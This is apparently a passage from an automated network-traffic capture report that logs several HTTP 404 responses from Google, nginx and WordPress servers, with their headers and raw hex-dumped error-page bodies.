J8LHgDJp=dZJCNG9Xj7DvAi9ejpIkzGHYwh9Y5DlBVDJSkboIch2iBNL/kC4eC2shxQMVAk9LP6OI7Lcjki6KE2f12KOQL9Ep3dHSAFR6zYjSWNbxPFKz0fJHehArqQLQbqhTQhFhr1vf+9cc8uS+o5NIymPlGKSNDXzHKPRtLGJb/gy2Uh6frMGue/tdAy88O1Qh89OlHgB5hio=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 09 Nov 2024 04:36:20 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 09 Nov 2024 04:36:23 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 09 Nov 2024 04:36:26 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 09 Nov 2024 04:36:28 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1730X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 09 Nov 2024 04:36:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 09 Nov 2024 04:36:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 09 Nov 2024 04:36:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 09 Nov 2024 04:36:42 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 09 Nov 2024 04:37:01 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1165Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 8f 1b 35 14 7d de fc 0a 77 10 7d 40 78 9c 5d 5a 1e b2 93 54 50 10 45 a2 50 51 a4 8a a7 ca 33 be 99 71 d7 e3 6b 6c 4f 26 29 ea 7f e7 7a be 9a dd 6d 51 29 51 a2 99 dc cf 73 cf 39 c5 83 1f 7e 7b fa c7 9f 2f 7e 64 4d 6c cd 6e 55 a4 07 33 d2 d6 db cc 45 fe fd ef d9 6e 75 51 34 20 15 3d 2f 8a 16 a2 64 56 b6 b0 cd 0e 1a 7a 87 3e 66 ac 42 1b c1 c6 6d d6 6b 15 9b ad 82 83 ae 80 0f 7f b2 bb 5d 1e 4b 8c e1 ac c7 a2 b6 0a 8e 5f 33 8b 7b 34 06 fb 8c 89 a1 29 ea 68 60 f7 1c 3a 16 74 04 f6 b0 55 32 34 d7 ec 29 b6 da d6 ec 25 a2 2d c4 58 93 aa 43 e5 b5 8b 2c f8 6a 9b 35 31 ba 8d 10 10 a2 07 23 79 99 a3 35 da 82 e8 1d d7 b6 32 9d 82 20 de d0 f7 af 0e fc 69 7a e4 6f 42 b6 2b c4 38 66 9c 18 4f 06 58 3c 39 42 1d e1 18 45 15 a8 e4 2b f6 f7 8a d1 a7 c4 23 0f fa 2d 41 d9 d0 bb 57 e0 39 85 ae 87 1c 6f f1 2d ff d7 82 1e ca 1b 1d 3f 5a f3 6e b5 2a 51 9d e6 55 b2 ba a9 3d 76 56 f1 0a 0d fa 0d eb 1b 62 64 1c 35 45 4a 43 45 63 04 0f e0 f7 c4 23 3f 6e 58 a3 95 02 3b c6 5b e9 6b 6d 37 6c 3d cc ff a2 f7 d2 4d 0b a4 d1 b5 e5 34 b2 0d 1b 56 91 2a e0 c7 16 a5 83 33 f2 b4 61 7b 03 13 f4 37 5d 88 7a 7f e2 93 7e b7 eb 49 19 de 80 ae 1b 8a 5f ae d7 87 66 58 95 4f b5 d3 b6 34 8b d2 b7 41 c9 2e 22 7b fc e5 18 74 52 a9 81 93 f5 f8 3f b1 cf 07 90 77 d6 c9 e3 e8 b2 0d 7b 74 b5 76 23 71 7b 44 2a 98 76 4d 59 c2 32 8f 46 32 93 46 1a b4 d7 47 50 d7 93 96 31 62 bb ac 33 b0 8f 33 4d d3 b4 99 a9 0f 21 49 17 96 d1 de 13 eb 96 28 67 1a ea 56 d6 b0 21 bb 5b 98 d7 27 e5 09 a5 3b b2 80 46 ab 5b 8d c9 22 8d 54 d8 9f b7 7c c0 07 9d 0f 29 e4 50 7f 40 3f 6d 8d b6 c0 4b 83 f3 dc 3d 69 92 bc 47 48 2e 1f b9 e3 59 b0 9f 04 7c b4 9e f9 48 ad 8b ac f9 e3 73 e5 78 44 97 f8 9d 27 2c d2 7d 4b c7 7c b3 84 3f a6 e0 10 57 50 a1 97 a3 2a ef 4f 8c d8 55 0d 97 d5 18 6f a5 d5 ae 33 43 d5 94 f7 d2 ce 5a 4a 63 d8 3a bf 0a 0c 64 98 da bb 00 9e 07 30 50 c5 f3 a9 07 f0 51 57 d2 cc 60 5a ad 94 99 72 03 9b 3c 38 59 0d f2 f4 5e ba 51 dd 10 65 ec 02 6f 21 04 92 6e 12 7a e1 76 1c fe ae 10 21 9e 0c ec 56 17 e9 53 10 69 37 cc 83 